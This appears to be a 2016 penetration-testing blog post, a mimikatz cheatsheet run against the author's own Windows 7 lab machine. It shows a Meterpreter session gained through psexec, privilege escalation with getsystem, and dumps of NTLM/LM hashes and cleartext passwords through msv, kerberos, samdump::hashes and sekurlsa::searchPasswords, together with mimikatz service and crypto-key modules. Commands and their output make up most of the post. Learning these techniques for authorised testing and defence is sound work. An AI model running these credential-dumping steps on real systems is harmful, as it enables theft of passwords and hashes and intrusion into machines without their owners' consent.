04 Sep 2016, 21:31

mimikatz cheatsheet

Let’s talk about mimikatz, I had the pleasure to play with this tool in a few penetration tests, and it’s been VERY useful. Mimikatz has been designed with the focus of getting LM & NTLM hashes with the added benefit of seeing passwords in cleartext sitting in memory in addition to more functions.

I have created a demo using a Win7 x86 to show you how it works. The username is dev with password password .

Our demo makes use of a Metasploit installation in a Docker container (thanks remnux) where the multi\handler is running.

Lets begin.

Getting a shell has been taken care of for us with psexec

msf exploit(handler) > 
[*] Sending stage (957999 bytes) to 10.0.0.114
[*] Meterpreter session 1 opened (172.17.0.2:2222 -> 10.0.0.114:49417) at 2016-09-04 19:20:27 +0000

msf exploit(handler) >

Done, now we have a session to play with. Let’s make sure we have only one session.

msf exploit(handler) > sessions -l

Active sessions
===============

  Id  Type                   Information          Connection
  --  ----                   -----------          ----------
  1   meterpreter x86/win32  dev-PC\dev @ DEV-PC  172.17.0.2:2222 -> 10.0.0.114:49417 (10.0.0.114)

msf exploit(handler) >

Now we jump into that session, with the below example.

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...
meterpreter >

The most important thing about mimikatz is the ability to extract the passwords in any form you like, however this can only be done when you are running meterpreter as SYSTEM. In the below example you will see that we are running as the user that was logged onto the system dev. This will not do.

meterpreter > getuid
Server username: dev-PC\dev
meterpreter > 

As I mentioned above, we need to be SYSTEM in order to do what we want to explain in this demo. So let’s execute a native meterpreter command to migrate the meterpreter service from the user account to a SYSTEM account. After getting system you can run getuid again to make sure we have the SYSTEM account.

meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Now that we have the most important step completed we can go ahead an recon the system for fun before we grab all the creds.

meterpreter > sysinfo
Computer        : DEV-PC
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x86/win32
meterpreter >

From here we can load mimikatz which will be the module of focus in this post.

meterpreter > load mimikatz
Loading extension mimikatz...success.
meterpreter >

After loading mimikatz, we load the help file to make sure it’s listening to us.

meterpreter > help mimikatz

Mimikatz Commands
=================

    Command           Description
    -------           -----------
    kerberos          Attempt to retrieve kerberos creds
    livessp           Attempt to retrieve livessp creds
    mimikatz_command  Run a custom command
    msv               Attempt to retrieve msv creds (hashes)
    ssp               Attempt to retrieve ssp creds
    tspkg             Attempt to retrieve tspkg creds
    wdigest           Attempt to retrieve wdigest creds

meterpreter >

If you wanted to check the version of mimikatz for some reason, you can do that by using the mimikatz_command.

meterpreter > mimikatz_command -f version
mimikatz 1.0 x86 (RC) (Jul 11 2016 21:35:47)
meterpreter >

Reading hashes and password from memory can be done in two ways

You can use both the mimikatz builtin commands and the mimikatz crafted commands to extract passwords from memory. Lets look at the builtin native method first.

Lets dump the NTLM/LM hashes using the builtin meterpreter method.

meterpreter > msv
[+] Running as SYSTEM
[*] Retrieving msv credentials
msv credentials
===============

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;103437  NTLM       dev-PC        dev            lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
0;103396  NTLM       dev-PC        dev            lm{ e52cac67419a9a224a3b108f3fa6cb6d }, ntlm{ 8846f7eaee8fb117ad06bdd830b7586c }
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  n.s. (Credentials KO)
0;996     Negotiate  WORKGROUP     DEV-PC$        n.s. (Credentials KO)
0;22584   NTLM                                    n.s. (Credentials KO)
0;999     NTLM       WORKGROUP     DEV-PC$        n.s. (Credentials KO)

meterpreter >

Now using the builtin method to extract cleartext passwords from memory. You will see the password for user dev is password as I explained at the beginning.

meterpreter > kerberos
[+] Running as SYSTEM
[*] Retrieving kerberos credentials
kerberos credentials
====================

AuthID    Package    Domain        User           Password
------    -------    ------        ----           --------
0;997     Negotiate  NT AUTHORITY  LOCAL SERVICE  
0;996     Negotiate  WORKGROUP     DEV-PC$        
0;22584   NTLM                                    
0;999     NTLM       WORKGROUP     DEV-PC$        
0;103437  NTLM       dev-PC        dev            password
0;103396  NTLM       dev-PC        dev            password

meterpreter >

Now let’s look at the mimikatz crafted commands to do the same thing.

Lets dump the hashs with mimikatz_command -f samdump::hashes.

meterpreter > mimikatz_command -f samdump::hashes
Ordinateur : dev-PC
BootKey    : d20b4e2698ac8389dd909b1b389ab826

Rid  : 500
User : Administrator
LM   : 
NTLM : 31d6cfe0d16ae931b73c59d7e0c089c0

Rid  : 501
User : Guest
LM   : 
NTLM : 

Rid  : 1001
User : dev
LM   : 
NTLM : 8846f7eaee8fb117ad06bdd830b7586c

Rid  : 1002
User : HomeGroupUser$
LM   : 
NTLM : 022fff2ba68fb20d5a32145c43912fa0
meterpreter > 

And naturally we can extract the passwords saved in memory too using mimikatz_command -f sekurlsa::searchPasswords. Here again we can see that user dev password is password.

meterpreter > mimikatz_command -f sekurlsa::searchPasswords
[0] { dev ; dev-PC ; password }
[1] { dev ; dev-PC ; password }
[2] { dev-PC ; dev ; password }
[3] { dev-PC ; dev ; password }
[4] { dev ; dev-PC ; password }
[5] { dev ; dev-PC ; password }
meterpreter >

Another useful command in the mimikatz bag is something called services. Using this command you can list/start/stop and remove windows services.

meterpreter > mimikatz_command -f service::
Module : 'service' identifi�, mais commande '' introuvable

Description du module : Manipulation des services
        list	- Liste les services et pilotes
       start	- D�marre un service ou pilote
        stop	- Arr�te un service ou pilote
      remove	- Supprime un service ou pilote
    mimikatz	- Installe et/ou d�marre le pilote mimikatz
meterpreter > 

meterpreter > mimikatz_command -f service::list
	KERNEL_DRIVER	STOPPED	1394ohci	1394 OHCI Compliant Host Controller
	KERNEL_DRIVER	RUNNING	ACPI	Microsoft ACPI Driver
	KERNEL_DRIVER	STOPPED	AcpiPmi	ACPI Power Meter Driver
 3568	WIN32_OWN_PROCESS	RUNNING	AdobeARMservice	Adobe Acrobat Update Service
	KERNEL_DRIVER	STOPPED	adp94xx	adp94xx
	KERNEL_DRIVER	STOPPED	adpahci	adpahci
	KERNEL_DRIVER	STOPPED	adpu320	adpu320
	WIN32_SHARE_PROCESS	STOPPED	AeLookupSvc	Application Experience
	KERNEL_DRIVER	RUNNING	AFD	Ancillary Function Driver for Winsock
	KERNEL_DRIVER	STOPPED	agp440	Intel AGP Bus Filter
	KERNEL_DRIVER	STOPPED	aic78xx	aic78xx
	WIN32_OWN_PROCESS	STOPPED	ALG	Application Layer Gateway Service
	KERNEL_DRIVER	STOPPED	aliide	aliide
	KERNEL_DRIVER	STOPPED	amdagp	AMD AGP Bus Filter Driver
	KERNEL_DRIVER	STOPPED	amdide	amdide
	KERNEL_DRIVER	STOPPED	AmdK8	AMD K8 Processor Driver
	KERNEL_DRIVER	STOPPED	AmdPPM	AMD Processor Driver
	KERNEL_DRIVER	STOPPED	amdsata	amdsata
	KERNEL_DRIVER	STOPPED	amdsbs	amdsbs
	KERNEL_DRIVER	RUNNING	amdxata	amdxata
	KERNEL_DRIVER	STOPPED	AppID	AppID Driver
	WIN32_SHARE_PROCESS	STOPPED	AppIDSvc	Application Identity
 1284	WIN32_SHARE_PROCESS	RUNNING	Appinfo	Application Information
	WIN32_SHARE_PROCESS	STOPPED	AppMgmt	Application Management
	KERNEL_DRIVER	STOPPED	arc	arc
	KERNEL_DRIVER	STOPPED	arcsas	arcsas
	KERNEL_DRIVER	STOPPED	AsyncMac	RAS Asynchronous Media Driver
	KERNEL_DRIVER	RUNNING	atapi	IDE Channel
 1256	WIN32_SHARE_PROCESS	RUNNING	AudioEndpointBuilder	Windows Audio Endpoint Builder
 1224	WIN32_SHARE_PROCESS	RUNNING	Audiosrv	Windows Audio
	WIN32_SHARE_PROCESS	STOPPED	AxInstSV	ActiveX Installer (AxInstSV)
	KERNEL_DRIVER	STOPPED	b06bdrv	Broadcom NetXtreme II VBD
<snip><snip><snip><snip><snip>
meterpreter >

You might think that having the ability to play with services would give you a little more power, and you are 100% correct. With mimikatz you have the ability to extract crypto certificates too (amongst other things) using the crypto command in mimikatz. See below.

meterpreter > mimikatz_command -f crypto::
Module : 'crypto' identifi�, mais commande '' introuvable

Description du module : Cryptographie et certificats
listProviders	- Liste les providers install�s)
  listStores	- Liste les magasins syst�me
listCertificates	- Liste les certificats
    listKeys	- Liste les conteneurs de cl�s
exportCertificates	- Exporte les certificats
  exportKeys	- Exporte les cl�s
    patchcng	- [experimental] Patch le gestionnaire de cl�s pour l'export de cl�s non exportable
   patchcapi	- [experimental] Patch la CryptoAPI courante pour l'export de cl�s non exportable
meterpreter > 

meterpreter > mimikatz_command -f crypto::listProviders
Providers CryptoAPI :
	Microsoft Base Cryptographic Provider v1.0
	Microsoft Base DSS and Diffie-Hellman Cryptographic Provider
	Microsoft Base DSS Cryptographic Provider
	Microsoft Base Smart Card Crypto Provider
	Microsoft DH SChannel Cryptographic Provider
	Microsoft Enhanced Cryptographic Provider v1.0
	Microsoft Enhanced DSS and Diffie-Hellman Cryptographic Provider
	Microsoft Enhanced RSA and AES Cryptographic Provider
	Microsoft RSA SChannel Cryptographic Provider
	Microsoft Strong Cryptographic Provider

Providers CNG :
	Microsoft Primitive Provider
	Microsoft Smart Card Key Storage Provider
	Microsoft Software Key Storage Provider
	Microsoft SSL Protocol Provider
meterpreter >

remember, don’t harm anyone with this knowledge.

stay tuned for more fun.

…the end.